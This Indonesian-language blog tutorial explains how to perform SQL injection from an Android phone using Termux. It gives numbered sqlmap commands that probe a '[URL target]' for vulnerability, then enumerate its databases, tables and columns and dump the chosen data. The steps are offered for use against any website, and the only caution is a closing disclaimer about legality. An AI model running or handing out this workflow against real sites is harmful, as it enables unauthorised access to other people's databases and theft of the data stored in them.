Cara SQL Injection di Termux

Cara SQL Injection di Termux
 Cara SQL Injection di Termux
Cara SQL Injection di Termux - SQL Injection adalah teknik hacking yang memanfaatkan celah keamanan pada aplikasi web untuk memasukkan perintah SQL yang tidak sah ke dalam database yang digunakan oleh aplikasi. Pada dasarnya, SQL Injection memungkinkan penyerang untuk mengakses, mengubah, atau menghapus data yang disimpan di dalam database. Dalam tutorial ini, kita akan mempelajari cara melakukan SQL Injection di Termux.


Apa itu Termux?

Termux adalah aplikasi terminal emulator dan lingkungan Linux yang berjalan di sistem operasi Android. Dengan Termux, Anda dapat mengakses fitur terminal dan menjalankan perintah Linux di perangkat Android Anda.


Langkah-langkah melakukan SQL Injection di Termux

Berikut adalah langkah-langkah yang perlu Anda ikuti untuk melakukan SQL Injection di Termux:


  1. Install aplikasi Termux dari Google Play Store
  2. Install paket sqlmap di Termux dengan menjalankan perintah "pkg install sqlmap"
  3. Periksa apakah target website rentan terhadap SQL Injection dengan menjalankan perintah "sqlmap -u [URL target]"
  4. Jika website rentan terhadap SQL Injection, jalankan perintah "sqlmap -u [URL target] --dbs" untuk mengetahui daftar database yang digunakan
  5. Pilih database yang ingin diakses dengan menjalankan perintah "sqlmap -u [URL target] -D [nama database] --tables" untuk mengetahui daftar tabel yang tersedia di dalam database tersebut
  6. Pilih tabel yang ingin diakses dengan menjalankan perintah "sqlmap -u [URL target] -D [nama database] -T [nama tabel] --columns" untuk mengetahui daftar kolom yang tersedia di dalam tabel tersebut
  7. Pilih kolom yang ingin diakses dengan menjalankan perintah "sqlmap -u [URL target] -D [nama database] -T [nama tabel] -C [nama kolom1,nama kolom2,nama kolom3,...] --dump" untuk menampilkan data yang tersimpan di dalam kolom tersebut.

Kesimpulan

Dalam tutorial ini, kita telah mempelajari cara melakukan SQL Injection di Termux. Namun, perlu diingat bahwa SQL Injection adalah kejahatan siber yang tidak sah dan melanggar hukum. Oleh karena itu, kami menyarankan agar Anda hanya menggunakan teknik ini untuk tujuan pendidikan atau keamanan, dan tidak untuk melakukan tindakan ilegal atau merugikan orang lain.